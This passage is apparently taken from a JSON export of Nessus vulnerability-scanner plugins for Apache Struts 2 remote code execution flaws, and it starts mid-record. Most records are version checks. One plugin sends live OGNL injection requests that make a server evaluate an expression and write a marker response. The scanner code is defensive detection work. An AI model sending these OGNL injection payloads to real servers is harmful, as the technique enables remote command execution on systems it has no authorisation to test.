script_bugtraq_id(60345, 60346);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2 OGNL Expression Handling Double Evaluation Error Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. 
Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request.\n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51bd9543\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-015.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.14.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\nforeach url (urls)\n{\n magic = rand();\n vuln = FALSE;\n\n vuln_url = url + \"/${\" + magic + \"+5}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"404 Not Found\") &&\n ((magic + 5) >< res[2])\n )\n {\n 
vuln = TRUE;\n output = strstr(res[2], \"<h1>\");\n break;\n }\n\n msg = SCRIPT_NAME - \".nasl\" + \"-\" + magic;\n vuln_url = url + \"/${%23w%3d%23context.get('com.opensymphony.xwork2.\" +\n \"dispatcher.HttpServletResponse').getWriter(),\"+\n \"%23w.print('Nessus%20Response:%20'),%23w.println('\" +msg+\n \"'),%23w.flush(),%23w.close()}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"200 OK\") &&\n (res[2] =~ \"^Nessus Response: \"+msg)\n )\n {\n vuln = TRUE;\n output = chomp(res[2]);\n break;\n }\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n line_limit : 3,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : output\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:46", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.3. 
It, therefore, is affected by a remote command execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.14.3 RCE (S2-015)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_3.NASL", "href": "https://www.tenable.com/plugins/nessus/117389", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117389);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2134\", \"CVE-2013-2135\");\n script_bugtraq_id(60345, 60346);\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.3 RCE (S2-015)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a remote command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.14.3. 
It, therefore, is affected by a remote command\nexecution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-015\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.3 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2135\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.14.2\", \"fixed_version\" : \"2.3.14.3\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:15:07", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.15.1. It, therefore, is affected by multiple vulnerabilities including a remote command execution vulnerability and an open redirect vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117362", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117362);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2013-2248\", \"CVE-2013-2251\");\n script_bugtraq_id(61189, 61196);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Apache 
Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.15.1. It, therefore, is affected by multiple\nvulnerabilities including a remote command execution vulnerability\nand an open redirect vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-016\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-017\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.15.1 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2251\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code 
Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.15\", \"fixed_version\" : \"2.3.15.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:46", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. 
It, therefore, is affected by multiple vulnerabilities including a remote command execution vulnerability and a cross-site scripting (XSS) vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.14.2 Multiple Vulnerabilities (S2-014)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2.NASL", "href": "https://www.tenable.com/plugins/nessus/117364", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117364);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.2 Multiple Vulnerabilities (S2-014)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.14.2. 
It, therefore, is affected by multiple\nvulnerabilities including a remote command execution vulnerability\nand a cross-site scripting (XSS) vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-014\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.2 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2115\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts IncludeParams < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n 
script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.14.1\", \"fixed_version\" : \"2.3.14.2\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:36", "description": "The version of Apache Struts running on the remote host is 2.x prior to to 2.3.20. It, therefore, is affected by multiple class loader vulnerabilities:\n\n - A class loader vulnerability exists in ParametersInterceptor due to improper access restriction to the getClass method. A remote, unauthenticated attacker can exploit this to manipulate the ClassLoader and execute arbitrary code. (CVE-2014-0112)\n\n - A class loader vulnerability exists in CookieInterceptor due to improper access restriction to the getClass. A remote, unauthenticated attacker can exploit this, via a specially crafted request which uses a wildcard cookiesName value to manipulate the ClassLoader and execute arbitrary code. 
(CVE-2014-0113)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-12T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.20 Multiple ClassLoader Manipulation Vulnerabilities (S2-021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0112", "CVE-2014-0113"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_16_2.NASL", "href": "https://www.tenable.com/plugins/nessus/117457", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117457);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-0112\", \"CVE-2014-0113\");\n script_bugtraq_id(61189, 61196);\n\n script_name(english:\"Apache Struts 2.x < 2.3.20 Multiple ClassLoader Manipulation Vulnerabilities (S2-021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework that is affected by multiple class loader\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x prior to to 2.3.20. It, therefore, is affected by\nmultiple class loader vulnerabilities:\n\n - A class loader vulnerability exists in ParametersInterceptor due to improper access restriction to the getClass\n method. A remote, unauthenticated attacker can exploit this to manipulate the ClassLoader and execute arbitrary\n code. (CVE-2014-0112)\n\n - A class loader vulnerability exists in CookieInterceptor due to improper access restriction to the getClass. 
A\n remote, unauthenticated attacker can exploit this, via a specially crafted request which uses a wildcard cookiesName\n value to manipulate the ClassLoader and execute arbitrary code. (CVE-2014-0113)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://cwiki.apache.org/confluence/display/WW/S2-021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?736174c4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.20 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0113\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::combined_get_app_info(app:'Apache Struts');\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.3.16.3', 'fixed_version' : '2.3.20' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:55", "description": "The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore, affected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). 
The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property without further validation, the provided OGNL expression contained in the skillName attribute gets evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only referencing validated values in the given expression. However, when referencing unvalidated user input in the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well as other classes from these standard library packages are not properly protected by the framework to deny access to potentially harmful underlying properties. 
(CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-08-14T00:00:00", "type": "nessus", "title": "Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_22.NASL", "href": "https://www.tenable.com/plugins/nessus/139607", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139607);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-0230\", \"CVE-2019-0233\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0113\");\n\n script_name(english:\"Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore,\naffected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to\n certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when\n a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code\n Execution (RCE). 
The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when\n the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify\n by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the\n skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property\n without further validation, the provided OGNL expression contained in the skillName attribute gets\n evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation\n is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only\n referencing validated values in the given expression. However, when referencing unvalidated user input in\n the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes\n mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack\n vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may\n manipulate the request such that the working copy of the uploaded file is set to read-only. As a result,\n subsequent actions on the file will fail with an error. It might also be possible to set the Servlet\n container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior\n to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well\n as other classes from these standard library packages are not properly protected by the framework to deny\n access to potentially harmful underlying properties. 
(CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-059\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-060\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.22 or later or apply the workarounds as referenced in in the vendor security\nbulletins.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0230\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by 
